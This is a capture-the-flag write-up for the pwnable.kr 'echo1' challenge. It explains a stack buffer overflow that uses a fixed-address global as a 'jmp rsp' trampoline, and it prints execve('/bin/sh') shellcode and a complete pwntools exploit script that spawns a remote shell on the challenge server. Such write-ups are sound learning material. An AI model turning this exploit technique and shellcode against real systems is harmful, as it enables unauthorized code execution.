- Echo1
The challenge can be found here.
Defining The Attack Surface
This binary doesn’t shy away from the avenue of attack:
my@pc:~/pwnablekr/echo1$ ./echo1
hey, what's your name? : alex
- select echo type -
- 1. : BOF echo
- 2. : FSB echo
- 3. : UAF echo
- 4. : exit
Indeed, looking at the diassembly from Ghidra for echo1
, aka BOF echo
we can see that, indeed, there’s nothing misleading, we have a BOF with more than enough room to easily change control flow.
undefined8 echo1(void)
char local_28 [32];
(**(code **)(o + 0x18))(o); // code ptr here points to `greetings`
(**(code **)(o + 0x20))(o); // code ptr here points to `byebye`
return 0;
Clearly, we’re going with a buffer overflow style attack.
Our goal is to launch a shell, so somehow we want to invoke shellcode which will call (something like) execve("/bin/sh", NULL, NULL)
So, a natural next question is where this shellcode can live; a quick checksec
answers that for us:
my@pc:~/pwnablekr/echo1$ checksec echo1
[*] '/home/alexsieusahai/pwnablekr/echo1/echo1'
Arch: amd64-64-little
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
NX disabled
; we can just have the shellcode live on the stack.
A next natural question, then, is how we can translate that buffer overflow via echo1
into an execve("/bin/sh", NULL, NULL)
Sadly, looking through the overflow points with gdb and a little bit of bruteforce-ish searching, no stack addresses are leaked via the buffer overflow here.
I tried looking for avenues of attack via ROP either for disclosure or as an alternative, but the binary is too small to produce anything I’d need (no pop rdi; ret
and friends in particular), nor do I (afaik) have a way of doing a puts_puts style disclosure into libc to get its gadgets.
After pondering for some time about what’s constant, it’s clear.
There is something important about ELFs with no PIE and writable data; the BSS has a constant location!
In particular, we can see in the main
decompilation that:
undefined8 main(void)
// symbol initialization...
undefined4 local_28;
// irrelevant code...
printf("hey, what\'s your name? : ");
// more irrelevant code...
id = local_28;
We write to a piece of data that has constant positioning! We can clearly see from the listing in the bss in the objdump that we take a dword (4 bytes) worth of data from our input.
my@pc:~/pwnablekr/echo1$ objdump -M intel -d echo1 | grep id
# ... a couple false positives
400976: 89 05 24 17 20 00 mov DWORD PTR [rip+0x201724],eax # 6020a0 <id>
# there we go! we're moving 4 bytes into the memory corresponding to the id symbol!
So, we have a 4 byte trampoline into code that we already know. Importantly, when we do the buffer overflow, we’re writing code around the stack pointer.
So, we can make our id
value be the bytecode for jmp rsp
, which is certainly smaller than 5 bytes, and use this to access any shellcode I’d have at rsp
after the ret
(in order to run the trampoline).
Perhaps interestingly, execve
doesn’t require it’s second argument (rsi
) to be [value_at_rdi, arg1, arg2, ...]
; it can merely be empty.
I remembered this from this blog post awhile back, from when I was studying shellcoding; at least according to this stackexchange thread it appears to be idiomatic to have argv[0]
be the binary name, but not required.
Thus, we want to do a syscall that looks like
execve("/bin/sh", NULL, NULL)
Thankfully, this is pretty straightforward; cyberchef can get you the “/bin/sh” reversed hexadecimal equivalent very easily (reversal is just due to little endianness), and hopefully everything else is straightforward.
We simply utilize the stack to store the “/bin/sh” string out of convenience, but in principle anywhere that’s not mprotect
ed against reads and writes should be usable, afaik.
The calling conventions for x86 dictate rdi, rsi, rdx
as the first three arguments to any syscall, hence the values below.
mov r10, 0x68732f6e69622f
push r10
mov rdi, rsp
mov rdx, 0
mov rsi, 0
mov al, 59
Obtaining the full exploit
Out of convenience, we use pwntools.
We store the shellcode in shell.s
, just out of syntax highlighting inspired convenience.
We know from the echo1
undefined echo1()
undefined AL:1 <RETURN>
undefined1 Stack[-0x28]:1 local_28 XREF[2]: 00400837(*),
echo1 XREF[4]: Entry Point(*), main:00400981(*),
That local_28
, what buffer we’re overwriting, needs 0x28 -> 40
bytes before we reach the stack pointer for the preceeding stack frame, which will dictate what we RET
to after doing the LEAVE
instruction at the end of the function.
So, we arbitrarily pass in 40 bytes worth of garbage.
Then, we want to ret to the trampoline, which we’ll just grab conveniently using ELF.symbols
Keep in mind that we RET
to this value, and then we JMP
; our shellcode then must exist just 8 bytes after the initial position of RSP
(ie, RSP only increases by 8 bytes before we JMP
to it), hence why we immediately tack the shellcode onto the payload.
is just really a helper found out by interacting with the binary.
from pwn import *
ID_BSS = p64(ELF('echo1').symbols['id'])
shellcode = open('spawn_shell.s').read()
shellcode = asm(shellcode, arch='x86_64', os='linux')
run_echo1 = b'\n1\n'
bof_payload = b'a' * 40 + ID_BSS + shellcode + b'\n'
payload = asm('jmp rsp', arch='x86_64', os='linux') + run_echo1 + bof_payload
open('in', 'wb').write(payload)
p = remote('', 9010)
And, we get the flag!
$ cat flag